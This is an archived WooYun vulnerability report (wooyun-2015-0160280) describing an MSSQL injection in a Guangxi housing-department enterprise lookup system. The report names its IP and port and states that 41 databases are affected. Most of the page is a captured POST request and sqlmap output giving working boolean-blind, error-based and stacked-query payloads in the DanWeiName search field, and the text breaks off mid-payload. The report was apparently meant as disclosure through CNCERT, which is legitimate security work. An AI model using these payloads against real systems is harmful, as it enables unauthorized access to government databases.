当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160280

漏洞标题:广西住建厅某系统MSSQL注入(涉及41个库)

相关厂商:http://221.7.246.44:8018/WebInfo/Default.aspx

漏洞作者: 无名人

提交时间:2015-12-11 12:36

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:11

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-11: 细节已通知厂商并且等待厂商处理中
2015-12-15: 厂商已经确认,细节仅向厂商公开
2015-12-25: 细节向核心白帽子及相关领域专家公开
2016-01-04: 细节向普通白帽子公开
2016-01-14: 细节向实习白帽子公开
2016-01-28: 细节向公众公开

简要描述:

RT

详细说明:

系统:**.**.**.**:8018/WebInfo/Default.aspx
漏洞地址:

POST /WebInfo/Enterprise/Enterprise.aspx HTTP/1.1
Host: **.**.**.**:8018
Proxy-Connection: keep-alive
Content-Length: 4422
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: **.**.**.**:8018
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:8018/WebInfo/Enterprise/Enterprise.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=hdyin1550ajs4l2s0qlges45
__VIEWSTATE=%2FwEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4EVGV4dAUM5LyB5Lia5L%2Bh5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L%2Bh5oGvZGQCAw9kFgYCAQ8PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i%2BacuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuWNleS9jQUCMTRnEAUM5bu66K6%2B5Y2V5L2NBQIxMWcQBQzli5jlr5%2FljZXkvY0FAjE1ZxAFDOiuvuiuoeWNleS9jQUCMTZnEAUP5oi%2F5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxAFDOWbreael%2BWNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub%2Fopb%2Flo67ml4%2Foh6rmsrvljLoFBjQ1MDAwMGcQBQnljZflroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQnmoqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK%2FluIIFBjQ1MDYwMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK%2FluIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluIIFBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAIBDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr%2FmlrDln47lu7rnrZHlt6XnqIvmnInpmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQwMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr%2FnrKzkuozlu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTAzMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6%2F56ys5LiJ5bu6562R5bel56iL5YWs5Y%2B4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQPDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUVBLTQxRjgyQ0QzQTI3MjDlhajlt57ljr%2Fln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M5YWJhYzc0YiTlhajlt57ljr%2Foo5Xpkavmt7flh53lnJ%2FmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM2QkNGNzY1QkU2Ny3lub%2Fopb%2Flhajlt57ljr%2FnrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJmYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgEPZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6%2F5paw5Z%2BO5oi%2F5Zyw5Lqn5byA5Y%2BR5YWs5Y%2B4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2QWAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmEtNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr%2FmiL%2FlnLDkuqflvIDlj5Hlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGMwZGUwMzY3MOWFqOW3nuWOv%2BWFtOWIm%2BaIv%2BWcsOS6p%2BW8gOWPkeaciemZkOi0o%2BS7u%2BWFrOWPuGQCAg9kFgJmDxUBCeahguael%2BW4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgtSZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2VIOavj%2BmhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ%2FjutdnPjul7ZM%3D&__VIEWSTATEGENERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=%2FwEWIQLMvfGkAgKjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAwKXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop%2BYBwLl3%2BFvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAuXfxacEAuXf6YANAuXf%2Fe0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x%2FI4IAo6xgGsCjrGUtAkC8b7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg%3D%3D&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiName=%E5%85%A8%E5%B7%9E*&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiType=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24ZiZhiNum=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24CityNum=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24Edate=&ctl00%24ctl00%24ContentPlaceHolder1%24Search%24BtnSearch=%E6%90%9C%E7%B4%A2


ctl00%24ctl00%24ContentPlaceHolder1%24Search%24DanWeiName参数存在注入

---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4
EVGV4dAUM5LyB5Lia5L+h5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L+h5oGvZGQCAw9kFgYCAQ8
PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i+a
cuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuW
NleS9jQUCMTRnEAUM5bu66K6+5Y2V5L2NBQIxMWcQBQzli5jlr5/ljZXkvY0FAjE1ZxAFDOiuvuiuoeW
NleS9jQUCMTZnEAUP5oi/5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxA
FDOWbreael+WNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8
CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub/opb/lo67ml4/oh6rmsrvljLoFBjQ1MDAwMGcQBQnljZf
lroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQn
moqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK/luIIFBjQ1MDY
wMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK/luIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ
1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluII
FBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAI
BDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVN
vdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI
5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr/mlrDln47lu7rnrZHlt6XnqIvmnIn
pmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQ
wMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9
kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr/nrKzkuoz
lu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTA
zMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU
5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6/56ys5LiJ5bu6562R5bel56iL5YWs5Y+4ZAI
CD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQ
PDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUV
BLTQxRjgyQ0QzQTI3MjDlhajlt57ljr/ln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhaz
lj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxU
BAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M
5YWJhYzc0YiTlhajlt57ljr/oo5Xpkavmt7flh53lnJ/mnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYL
mnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxY
EHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM
2QkNGNzY1QkU2Ny3lub/opb/lhajlt57ljr/nrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgI
PZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9
kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJ
mYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBY
CZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgE
PZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6/5paw5Z+
O5oi/5Zyw5Lqn5byA5Y+R5YWs5Y+4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2Q
WAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmE
tNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr/miL/lnLDkuqflvIDlj5Hlhazlj7hkAgIPZBY
CZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgA
fBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGM
wZGUwMzY3MOWFqOW3nuWOv+WFtOWIm+aIv+WcsOS6p+W8gOWPkeaciemZkOi0o+S7u+WFrOWPuGQCAg9
kFgJmDxUBCeahguael+W4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgt
SZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2
VIOavj+mhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ/jutdnPjul7ZM=&__VIEWSTATEGEN
ERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWIQLMvfGkAg
KjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAw
KXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop+YBwLl3+FvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAu
XfxacEAuXf6YANAuXf/e0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x/I4IAo6xgGsCjrGUtAkC8b
7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg==&ctl00$ctl00$ContentPlaceHolder1$Searc
h$DanWeiName=%E5%85%A8%E5%B7%9E%' AND 9231=9231 AND '%'='&ctl00$ctl00$ContentPla
ceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder1$Search$ZiZhiNum=&ct
l00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$ContentPlaceHolder1$Se
arch$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearch=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4
EVGV4dAUM5LyB5Lia5L+h5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L+h5oGvZGQCAw9kFgYCAQ8
PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i+a
cuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuW
NleS9jQUCMTRnEAUM5bu66K6+5Y2V5L2NBQIxMWcQBQzli5jlr5/ljZXkvY0FAjE1ZxAFDOiuvuiuoeW
NleS9jQUCMTZnEAUP5oi/5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxA
FDOWbreael+WNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8
CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub/opb/lo67ml4/oh6rmsrvljLoFBjQ1MDAwMGcQBQnljZf
lroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQn
moqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK/luIIFBjQ1MDY
wMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK/luIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ
1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluII
FBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAI
BDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVN
vdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI
5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr/mlrDln47lu7rnrZHlt6XnqIvmnIn
pmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQ
wMmQCBA9kFgJmDxUBAGQCAg8PFgQeCUJhY2tDb2xvcgoAHgRfIVNCAghkFgpmD2QWAmYPFQEBMmQCAQ9
kFgJmDxUCJDJFMUU5RkU3LTYwMUYtNDdCRS1COTIwLUI1NDBERThBNTAzRiHlhajlt57ljr/nrKzkuoz
lu7rnrZHlt6XnqIvlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ9BMzAxMjA0NTA
zMjQgMDNkAgQPZBYCZg8VAQBkAgMPZBYKZg9kFgJmDxUBATNkAgEPZBYCZg8VAiQ3OUU3NUM3MC01ODU
5LTQzREYtOUY5Qy05NTE0QjcyMzlBNUEh5YWo5bee5Y6/56ys5LiJ5bu6562R5bel56iL5YWs5Y+4ZAI
CD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEOQTMwMTIwNDUwMzI0MDJkAgQPZBYCZg8VAQBkAgQ
PDxYEHwUKAB8GAghkFgpmD2QWAmYPFQEBNGQCAQ9kFgJmDxUCJEExNEMzMDA2LTYzQUYtNDJEOC04OUV
BLTQxRjgyQ0QzQTI3MjDlhajlt57ljr/ln47kuaHlu7rorr7lu7rnrZHlronoo4Xlt6XnqIvmgLvlhaz
lj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMTA0NTAzMjQwMWQCBA9kFgJmDxU
BAGQCBQ9kFgpmD2QWAmYPFQEBNWQCAQ9kFgJmDxUCJGE2MDk4MGQ4LWFiZWUtNDk1My04YmE4LTBkM2M
5YWJhYzc0YiTlhajlt57ljr/oo5Xpkavmt7flh53lnJ/mnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYL
mnpfluIJkAgMPZBYCZg8VAQ5CMzA1NDA0NTAzMjQwMWQCBA9kFgJmDxUBCjIwMTMtMDctMDlkAgYPDxY
EHwUKAB8GAghkFgpmD2QWAmYPFQEBNmQCAQ9kFgJmDxUCJERFQzlCNjNDLUZFMTAtNDFENi1CQ0IwLUM
2QkNGNzY1QkU2Ny3lub/opb/lhajlt57ljr/nrKzkupTlu7rnrZHlronoo4Xlt6XnqIvlhazlj7hkAgI
PZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxMjA0NTAzMjQwMWQCBA9kFgJmDxUBAGQCBw9
kFgpmD2QWAmYPFQEBN2QCAQ9kFgJmDxUCJDM2ZTAwN2JlLWE1ZTYtNDU3Ny05ODVkLTE5YjlkYjdjMGJ
mYx7lhajlt57kuIfpuYLlnLDkuqfmnInpmZDlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBY
CZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIIDw8WBB8FCgAfBgIIZBYKZg9kFgJmDxUBAThkAgE
PZBYCZg8VAiRkMmU2YjdhZS00NmE2LTQyNDAtYWEyZi02Y2VkZjI0NjUwMDMk5YWo5bee5Y6/5paw5Z+
O5oi/5Zyw5Lqn5byA5Y+R5YWs5Y+4ZAICD2QWAmYPFQEJ5qGC5p6X5biCZAIDD2QWAmYPFQEAZAIED2Q
WAmYPFQEKMTkwMC0wMS0wMWQCCQ9kFgpmD2QWAmYPFQEBOWQCAQ9kFgJmDxUCJDVlYjc4NWNlLTQ0ZmE
tNDk0ZC1hZTllLWMxNzIyNmEyOTgyNB7lhajlt57ljr/miL/lnLDkuqflvIDlj5Hlhazlj7hkAgIPZBY
CZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQBkAgQPZBYCZg8VAQoxOTAwLTAxLTAxZAIKDw8WBB8FCgA
fBgIIZBYKZg9kFgJmDxUBAjEwZAIBD2QWAmYPFQIkZmI1ODg4OGQtNDY3NC00ZGVjLWI1YWMtNWI5NGM
wZGUwMzY3MOWFqOW3nuWOv+WFtOWIm+aIv+WcsOS6p+W8gOWPkeaciemZkOi0o+S7u+WFrOWPuGQCAg9
kFgJmDxUBCeahguael+W4gmQCAw9kFgJmDxUBAGQCBA9kFgJmDxUBCjE5MDAtMDEtMDFkAgMPDxYGHgt
SZWNvcmRjb3VudAIRHg5DdXN0b21JbmZvVGV4dAUq5b2T5YmN56ysMS8y6aG1IOWFsTE35p2h6K6w5b2
VIOavj+mhtTEw5p2hHghQYWdlU2l6ZQIKZGRkFrFbBwiS9lAJVJ/jutdnPjul7ZM=&__VIEWSTATEGEN
ERATOR=2EF0303B&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWIQLMvfGkAg
KjsrOUBQKb1YvfDwKUuo2xAwKUuoGxAwKUutWyAwKUutGyAwKUuu2yAwKUut2yAwKUutmyAwKQuumyAw
KXuumyAwKVuuGyAwLA5PH2DgKJzbX2CwKZop+YBwLl3+FvAuXf9cgJAuXfmZUCAuXfrf4KAuXfsdsDAu
XfxacEAuXf6YANAuXf/e0FAuXfwYQLAuXf1eEDAo6xxNgOAo6x6KUHAo6x/I4IAo6xgGsCjrGUtAkC8b
7ZswwC2datqgvfWJbERdmZ02fWoiFl4HBUDBMYIg==&ctl00$ctl00$ContentPlaceHolder1$Searc
h$DanWeiName=%E5%85%A8%E5%B7%9E%' AND 3956=CONVERT(INT,(SELECT CHAR(113)+CHAR(12
2)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (3956=3956) THEN CHAR(49) EL
SE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(98)+CHAR(113))) AND '%'='&c
tl00$ctl00$ContentPlaceHolder1$Search$DanWeiType=&ctl00$ctl00$ContentPlaceHolder
1$Search$ZiZhiNum=&ctl00$ctl00$ContentPlaceHolder1$Search$CityNum=&ctl00$ctl00$C
ontentPlaceHolder1$Search$Edate=&ctl00$ctl00$ContentPlaceHolder1$Search$BtnSearc
h=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: __VIEWSTATE=/wEPDwUJOTYzNTYxNjUxD2QWAmYPZBYCZg9kFgICAw9kFgRmDw8WAh4
EVGV4dAUM5LyB5Lia5L+h5oGvZGQCAQ9kFgYCAQ8PFgIfAAUM5LyB5Lia5L+h5oGvZGQCAw9kFgYCAQ8
PFgIfAAUG5YWo5beeZGQCAw8QZA8WC2YCAQICAgMCBAIFAgYCBwIIAgkCChYLEGVlZxAFDOajgOa1i+a
cuuaehAUCMTlnEAUM5oub5qCH5Luj55CGBQIxOGcQBQzmlr3lt6XljZXkvY0FAjEzZxAFDOebkeeQhuW
NleS9jQUCMTRnEAUM5bu66K6+5Y2V5L2NBQIxMWcQBQzli5jlr5/ljZXkvY0FAjE1ZxAFDOiuvuiuoeW
NleS9jQUCMTZnEAUP5oi/5Zyw5Lqn5LyB5LiaBQI1MmcQBRLmlr3lt6Xlm77lrqHmnLrmnoQFAjQyZxA
FDOWbreael+WNleS9jQUCMjBnZGQCBw8QZA8WEWYCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOAg8
CEBYREGVlZxAFBuWMuuWklgUBMGcQBRXlub/opb/lo67ml4/oh6rmsrvljLoFBjQ1MDAwMGcQBQnljZf
lroHluIIFBjQ1MDEwMGcQBQnmn7Plt57luIIFBjQ1MDIwMGcQBQnmoYLmnpfluIIFBjQ1MDMwMGcQBQn
moqflt57luIIFBjQ1MDQwMGcQBQnljJfmtbfluIIFBjQ1MDUwMGcQBQzpmLLln47muK/luIIFBjQ1MDY
wMGcQBQnpkqblt57luIIFBjQ1MDcwMGcQBQnotLXmuK/luIIFBjQ1MDgwMGcQBQnnjonmnpfluIIFBjQ
1MDkwMGcQBQnnmb7oibLluIIFBjQ1MTAwMGcQBQnotLrlt57luIIFBjQ1MTEwMGcQBQnmsrPmsaDluII
FBjQ1MTIwMGcQBQnmnaXlrr7luIIFBjQ1MTMwMGcQBQnltIflt6bluIIFBjQ1MTQwMGdkZAIFD2QWBAI
BDzwrAAsBAA8WCB4IRGF0YUtleXMWAB4LXyFJdGVtQ291bnQCCh4JUGFnZUNvdW50AgEeFV8hRGF0YVN
vdXJjZUl0ZW1Db3VudAIKZBYCZg9kFhQCAQ9kFgpmD2QWAmYPFQEBMWQCAQ9kFgJmDxUCJDI1ODA2OTI
5LTk1NzAtNDg4MS1CM0IxLTBCNDY0MzgzN0VDQi3lhajlt57ljr/mlrDln47lu7rnrZHlt6XnqIvmnIn
pmZDotKPku7vlhazlj7hkAgIPZBYCZg8VAQnmoYLmnpfluIJkAgMPZBYCZg8VAQ5BMzAxNDA0NTAzMjQ
